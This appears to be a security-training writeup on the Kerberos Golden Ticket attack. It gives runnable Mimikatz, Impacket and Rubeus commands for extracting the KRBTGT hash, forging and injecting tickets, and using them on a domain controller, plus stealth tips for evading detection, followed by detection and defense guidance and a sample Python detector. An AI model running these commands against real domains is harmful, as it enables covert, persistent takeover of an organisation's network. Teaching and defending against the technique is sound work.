Golden Ticket Attack

Level: advanced | 40 min | Writeup

Forging TGTs for persistent domain access

Learning Objectives

  • Understand golden tickets
  • Extract KRBTGT hash
  • Forge golden tickets
  • Maintain persistent access

The Golden Ticket attack is the nuclear option of Active Directory attacks. With the KRBTGT account's hash, you can forge Ticket Granting Tickets (TGTs) for ANY user - even non-existent ones - with ANY privileges, valid for years.

Think of KRBTGT as the master key that signs all VIP passes. If you have that master key, you can create unlimited VIP passes that every bouncer will accept as legitimate.

Extreme Persistence

Golden tickets persist even after password resets, user deletions, and system rebuilds. The ONLY way to invalidate them is to reset the KRBTGT password TWICE.

How Golden Tickets Work

Normal Kerberos:
1. User authenticates, gets TGT encrypted with KRBTGT hash
2. TGT contains user's group memberships (PAC)
3. User presents TGT to get service tickets
4. KDC trusts TGT because it's encrypted with KRBTGT

Golden Ticket Attack:
1. Attacker obtains KRBTGT hash (DCSync, NTDS.dit)
2. Attacker forges TGT with:
   - Any username (even fake ones!)
   - Any group memberships (Domain Admins!)
   - Long expiration (10 years!)
3. KDC accepts forged TGT as legitimate
4. Attacker has permanent domain access

Why It Works

The KDC doesn't validate TGT contents against AD - it just decrypts the ticket and trusts what it finds inside, including the PAC. Anything encrypted with the KRBTGT key is therefore treated as a "valid" ticket.

Obtaining KRBTGT Hash

DCSync Attack

bash
# Requires: Domain Admin or DCSync rights

# Impacket secretsdump
secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user krbtgt

# Mimikatz DCSync
lsadump::dcsync /domain:corp.local /user:krbtgt

From NTDS.dit

bash
# If you have NTDS.dit and SYSTEM hive
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

# Extract just KRBTGT
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL | grep krbtgt

From Memory

# Mimikatz on DC
privilege::debug
lsadump::lsa /inject /name:krbtgt

Forging the Golden Ticket

Required Information

You need:
├── KRBTGT NTLM hash (or AES key)
├── Domain SID (S-1-5-21-...)
├── Domain name (corp.local)
└── Username to impersonate (Administrator)

Mimikatz

# Get domain SID (from a normal shell, not the mimikatz console)
whoami /user   # Remove the last part (user RID)
# Or: Get-ADDomain | Select-Object DomainSID

# Forge golden ticket (mimikatz commands are entered on a single line)
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx /ptt

# Options:
# /user:   - Username (can be fake!)
# /domain: - Domain FQDN
# /sid:    - Domain SID
# /krbtgt: - KRBTGT NTLM hash
# /ptt     - Pass-the-Ticket (inject immediately)
# /ticket: - Save to file instead

# Inject saved ticket
kerberos::ptt ticket.kirbi

Impacket (Linux)

bash
# Create golden ticket
ticketer.py -nthash a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx \
    -domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
    -domain corp.local Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

Rubeus

powershell
# Create and inject golden ticket (PowerShell continues lines with a backtick, not a backslash)
.\Rubeus.exe golden /user:Administrator /domain:corp.local `
    /sid:S-1-5-21-... /rc4:a9b30e5b... /ptt

# With AES key (more stealthy)
.\Rubeus.exe golden /user:Administrator /domain:corp.local `
    /sid:S-1-5-21-... /aes256:... /ptt

Use AES Keys

Modern detection looks for RC4 tickets when AES is available. Use AES256 keys when possible for stealthier golden tickets.

Using the Golden Ticket

bash
# After injecting ticket, access any resource

# List DC shares (Windows, after /ptt)
dir \\dc.corp.local\c$

# PsExec to DC (Windows)
psexec.exe \\dc.corp.local cmd.exe

# Linux with exported ticket
export KRB5CCNAME=Administrator.ccache
smbclient //dc.corp.local/C$ -k -N   # -N: no password prompt, ticket comes from KRB5CCNAME
psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

# DCSync (you're now Domain Admin!)
secretsdump.py -k -no-pass corp.local/Administrator@dc.corp.local

Stealth Considerations

  • Use real usernames: Fake users might get flagged
  • Use AES keys: RC4 is suspicious in modern environments
  • Reasonable validity: 10-year tickets look suspicious
  • Match group membership: Use realistic group SIDs

# Stealthier golden ticket options
/startoffset:-10   # Ticket started 10 mins ago
/endin:600         # Valid for 10 hours
/renewmax:10080    # 7 day renewal

Detection & Defense

Detection:
├── Event ID 4769 - TGS request with non-existent user
├── Event ID 4624 - Logon with suspicious ticket
├── AES/RC4 mismatch in environment
└── Tickets with unusual validity periods

Defense:
├── Reset KRBTGT password TWICE (different days)
├── Reduce KRBTGT password age
├── Monitor for DCSync operations
├── Alert on direct LDAP access to KRBTGT
└── Credential Guard prevents hash extraction
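As an added example that is not part of this writeup (and not any vendor's detection rule), the Python below implements the log-based indicators listed under Detection over constructed records: 4769 requests for accounts AD does not know, RC4 tickets in an AES-capable domain, Kerberos 4624 logons by unknown accounts, and ticket lifetimes beyond policy. The account list, the policy limits (Windows defaults of 10 h / 7 days are assumed), the field subset and all sample events are assumptions made for the example. The third sample ticket uses the stealth options from the previous section, so it shows why a lifetime check alone is not enough.

```python
"""Golden-ticket indicator checks over constructed Windows Security event records.

Added example, not from the original writeup. Records mirror a few fields of
Event ID 4769 (service ticket request) and 4624 (logon); ticket records are the
kind you would build from klist output. Account list and policy values are assumed.
"""
from datetime import datetime, timedelta

# Assumption: accounts that actually exist in AD (normally a refreshed directory export).
KNOWN_ACCOUNTS = {"administrator", "krbtgt", "jsmith", "svc_backup"}

# Kerberos encryption type codes as logged in TicketEncryptionType.
RC4_HMAC = 0x17
AES128_CTS_HMAC_SHA1 = 0x11
AES256_CTS_HMAC_SHA1 = 0x12

# Assumed domain policy (Windows defaults); compare against your own GPO values.
MAX_TGT_LIFETIME = timedelta(hours=10)
MAX_RENEWAL = timedelta(days=7)


def _etype(value):
    """TicketEncryptionType is logged as a hex string such as "0x12"; accept ints too."""
    return int(value, 16) if isinstance(value, str) else int(value)


def _account(target_user_name):
    """Normalise 'Administrator@CORP.LOCAL' or 'CORP\\jsmith' to a bare lowercase name."""
    return target_user_name.split("@")[0].split("\\")[-1].lower()


def check_tgs_request(event):
    """Findings for one 4769 record: unknown account, or RC4 where AES is available."""
    findings = []
    user = _account(event["TargetUserName"])
    if user not in KNOWN_ACCOUNTS:
        findings.append(f"4769: service ticket for non-existent account '{user}' from {event['IpAddress']}")
    if _etype(event["TicketEncryptionType"]) == RC4_HMAC:
        findings.append(f"4769: RC4 (0x17) ticket for '{user}' in an AES-capable domain")
    return findings


def check_logon(event):
    """Findings for one 4624 record: Kerberos logon by an account AD does not know."""
    user = _account(event["TargetUserName"])
    if event["AuthenticationPackageName"].lower() == "kerberos" and user not in KNOWN_ACCOUNTS:
        return [f"4624: Kerberos logon by non-existent account '{user}' from {event['IpAddress']}"]
    return []


def check_ticket_lifetime(ticket):
    """Findings for a ticket record with start/end/renew_until datetimes beyond policy."""
    findings = []
    lifetime = ticket["end"] - ticket["start"]
    renewal = ticket["renew_until"] - ticket["start"]
    if lifetime > MAX_TGT_LIFETIME:
        findings.append(f"ticket for '{ticket['client']}' valid {lifetime.days} days, policy max {MAX_TGT_LIFETIME}")
    if renewal > MAX_RENEWAL:
        findings.append(f"ticket for '{ticket['client']}' renewable {renewal.days} days, policy max {MAX_RENEWAL.days} days")
    return findings


def scan(events, tickets):
    """Run every check and return the combined list of findings."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4769:
            findings += check_tgs_request(ev)
        elif ev["EventID"] == 4624:
            findings += check_logon(ev)
    for t in tickets:
        findings += check_ticket_lifetime(t)
    return findings


# Constructed sample data: 'ghost' does not exist in AD and has an RC4, 10-year ticket
# (a default golden ticket); jsmith is normal activity; the third ticket is a forged
# 10 h / 7 day ticket that passes the lifetime check and is caught only by other indicators.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.15"},
    {"EventID": 4769, "TargetUserName": "ghost@CORP.LOCAL", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "TargetUserName": "ghost", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.99"},
    {"EventID": 4624, "TargetUserName": "jsmith", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.15"},
]
T0 = datetime(2024, 1, 1, 9, 0)
SAMPLE_TICKETS = [
    {"client": "jsmith", "start": T0, "end": T0 + timedelta(hours=10), "renew_until": T0 + timedelta(days=7)},
    {"client": "ghost", "start": T0, "end": T0 + timedelta(days=3650), "renew_until": T0 + timedelta(days=3650)},
    {"client": "administrator", "start": T0 - timedelta(minutes=10), "end": T0 + timedelta(minutes=590),
     "renew_until": T0 + timedelta(days=7) - timedelta(minutes=10)},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS, SAMPLE_TICKETS):
        print(line)
```

Running it prints five findings, all for 'ghost'; the tuned 'administrator' ticket produces none, which is the reason to correlate account existence and encryption type with lifetime rather than relying on any single indicator.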

KRBTGT Reset Procedure

Resetting KRBTGT ONCE doesn't help - AD keeps the previous KRBTGT password and still accepts tickets encrypted with it. You must reset TWICE, with enough time between resets for replication and for existing tickets to expire, to fully invalidate golden tickets.

Golden Ticket Methodology

Golden Ticket Attack Flow

1. Compromise DA: Get Domain Admin access first
2. DCSync: Extract KRBTGT hash via DCSync
3. Get Domain SID: whoami /user or Get-ADDomain
4. Forge Ticket: Use Mimikatz/Rubeus/ticketer.py
5. Inject: Pass-the-Ticket into current session
6. Persist: Save ticket for future access

Knowledge Check

Quick Quiz (question 1 of 3)

What is required to forge a golden ticket?

Challenges

Forge the Ticket

Challenge (advanced)

With Domain Admin access, extract the KRBTGT hash and create a golden ticket that provides persistent access.


Key Takeaways

  • Golden tickets forge TGTs using the KRBTGT hash
  • Any user, any privileges, any validity period
  • Survives password resets and user deletions
  • Requires KRBTGT hash and domain SID
  • Only invalidated by resetting KRBTGT TWICE
  • Use AES keys for stealthier tickets